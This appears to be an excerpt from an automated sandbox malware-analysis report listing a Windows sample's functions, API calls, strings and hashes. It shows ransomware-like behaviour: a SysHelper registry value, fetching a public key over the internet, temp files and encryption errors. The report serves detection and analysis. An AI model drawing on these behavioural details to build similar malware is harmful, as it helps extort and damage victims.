                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                    • String ID: cmd.exe
                                                                                                                                                    • API String ID: 2696918072-723907552
                                                                                                                                                    • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                                    • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                                                                    • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                                    • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                    • API String ID: 2574300362-2555811374
                                                                                                                                                    • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                                    • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                                                                    • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                                    • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                    • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                    • API String ID: 1783060780-3771355929
                                                                                                                                                    • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                    • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                                                                    • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                    • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                    • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                    • API String ID: 909875538-2908105608
                                                                                                                                                    • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                    • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                                                                    • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                    • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseValue$OpenQuery
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                    • API String ID: 3962714758-1667468722
                                                                                                                                                    • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                    • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                                                                    • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                    • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0041E707
                                                                                                                                                      • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                                                                    • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                    • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                                                                    • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                    • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                    • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                    • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                    • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                    • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                                                                    • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                    • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                    • API String ID: 2805819797-1771568745
                                                                                                                                                    • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                    • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                                                                    • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                    • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                    • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                                                                    • API String ID: 1302938615-3129329331
                                                                                                                                                    • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                                    • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                                                                    • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                                    • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___unDName.LIBCMT ref: 0043071B
                                                                                                                                                    • _strlen.LIBCMT ref: 0043072E
                                                                                                                                                    • __lock.LIBCMT ref: 0043074A
                                                                                                                                                    • _malloc.LIBCMT ref: 0043075C
                                                                                                                                                    • _malloc.LIBCMT ref: 0043076D
                                                                                                                                                    • _free.LIBCMT ref: 004307B6
                                                                                                                                                      • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                                                                                    • _free.LIBCMT ref: 004307AF
                                                                                                                                                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3704956918-0
                                                                                                                                                    • Opcode ID: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                                                                                                                                                    • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                                                                                    • Opcode Fuzzy Hash: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                                                                                                                                                    • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 00411B1E
                                                                                                                                                    • timeGetTime.WINMM ref: 00411B29
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                                                                    • timeGetTime.WINMM ref: 00411B78
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3697694649-0
                                                                                                                                                    • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                    • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                                                                    • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                    • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __init_pointers.LIBCMT ref: 00425141
                                                                                                                                                      • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                                                                      • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                                                                      • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                                                                    • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                                                                    • __mtterm.LIBCMT ref: 0042514F
                                                                                                                                                      • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                                                                      • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                                                                      • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00425174
                                                                                                                                                    • __initptd.LIBCMT ref: 00425196
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3567560977-0
                                                                                                                                                    • Opcode ID: cc0f5d6b2fdb9ef589aaf1f09e5703e68a62278c51f30d11e6c2248a47004f36
                                                                                                                                                    • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                                                                    • Opcode Fuzzy Hash: cc0f5d6b2fdb9ef589aaf1f09e5703e68a62278c51f30d11e6c2248a47004f36
                                                                                                                                                    • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0042594A
                                                                                                                                                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                      • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                    • _free.LIBCMT ref: 00425970
                                                                                                                                                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                    • __lock.LIBCMT ref: 00425989
                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                                                                    • _free.LIBCMT ref: 004259C4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 626533743-0
                                                                                                                                                    • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                    • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                                                                    • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                    • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___from_strstr_to_strchr
                                                                                                                                                    • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                    • API String ID: 601868998-2416195885
                                                                                                                                                    • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                                    • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                                                                    • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                                    • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                                                                    • API String ID: 2102423945-3653307630
